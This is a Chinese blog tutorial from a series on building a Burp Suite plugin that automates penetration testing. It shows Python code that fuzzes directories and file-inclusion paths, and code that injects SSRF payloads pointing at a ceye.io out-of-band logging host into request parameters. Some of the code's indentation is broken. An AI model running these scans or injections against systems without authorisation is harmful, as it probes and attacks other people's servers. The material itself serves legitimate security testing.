基于BurpSuit插件打造渗透测试自动化之路(5)

首先分析url，获取其404页面的状态码和返回数据包大小，再进行扫描根据扫描状态码判断是否为敏感目录，这里的状态码判断抄的李姐姐的bbscan，扫描页面的大小和404页面的大小要大于50，这点可以动态调整

def lfiDir(self, request, protocol, host, port, ishttps, url,html404_status, html404_content):
        for paraNewValue in self.fuzzLFI.dir2:
            newRequest = self._helpers.buildHttpRequest(URL(url+paraNewValue))
            #print(url+paraNewValue)
            newResponse = self._callbacks.makeHttpRequest(host, port, ishttps, newRequest)
            newAnalyzedRequest, newReqHeaders, newReqBodys, newReqMethod, newReqParameters = self.get_request_info(
                newRequest)

newResHeaders, newResBodys, newResStatusCode, resLength = self.get_response_info(
                newResponse)

errorInject = self.fuzzLFI.errorFlag.findall(newResBodys)

if errorInject  or (newResStatusCode == 206) or ((newResStatusCode == 200 or newResStatusCode == 302 or newResStatusCode == 301) and abs(resLength - len(html404_content))>50):
                newReqUrl = self.get_request_url(protocol, newReqHeaders,host,port)
                content = '[+]{} ->{} {} [Headers] -> {} [Bodys] -> {}'.format('[DIR GET]',errorInject,newReqUrl, newReqHeaders, newReqBodys)
                print(content)
                self.save(content + ' ')
                print('-' * 50)
                break

2.3

xxe和ssrf的http协议使用ceye.io 和dnslog.io，然后调用api接口查询是否有响应dnslog记录

SSRF代码示例，这里把url跳转也放在ssrf判断里面了

def ssrfHttp(self, request, protocol, host, port, ishttps, parameterName, parameterValue, parameterType,ResStatusCode):
        paraNewValue = 'http://'+host+'.m4mta5.ceye.io/'+host+parameterName+"testssrf1234567890"
        newParameter = self._helpers.buildParameter(parameterName, paraNewValue, parameterType)
        newRequest = self._helpers.updateParameter(request, newParameter)
            #print(newRequest)
        newResponse = self._callbacks.makeHttpRequest(host, port, ishttps, newRequest)
        newAnalyzedRequest, newReqHeaders, newReqBodys, newReqMethod, newReqParameters = self.get_request_info(
                newRequest)

        newResHeaders, newResBodys, newResStatusCode,resLength= self.get_response_info(newResponse)

pattern = re.compile(host + parameterName + "testssrf1234567890" )
        response = self.ceyeFin()
        result = pattern.findall(response)
        if result:
            newReqUrl = self.get_request_url(protocol, newReqHeaders,host,port,port)
            content = '[+]{} -> {} [Headers] -> {} [Bodys] -> {}'.format('[SSRF GET]',newReqUrl, newReqHeaders, newReqBodys)
            print (content)
            self.save(content + ' ')
            print ('-' * 50)

        if (paraNewValue in "".join(newResHeaders) and newResStatusCode!=ResStatusCode):
            newReqUrl = self.get_request_url(protocol, newReqHeaders,host,port)
            content = '[+]{} -> {} [Headers] -> {} [Bodys] -> {}'.format('[URL GET]', newReqUrl, newReqHeaders,
                                                                           newReqBodys)
            print (content)
            self.save(content + ' ')
            print ('-' * 50)

4、展示效果

SSRFfile协议，DIrscan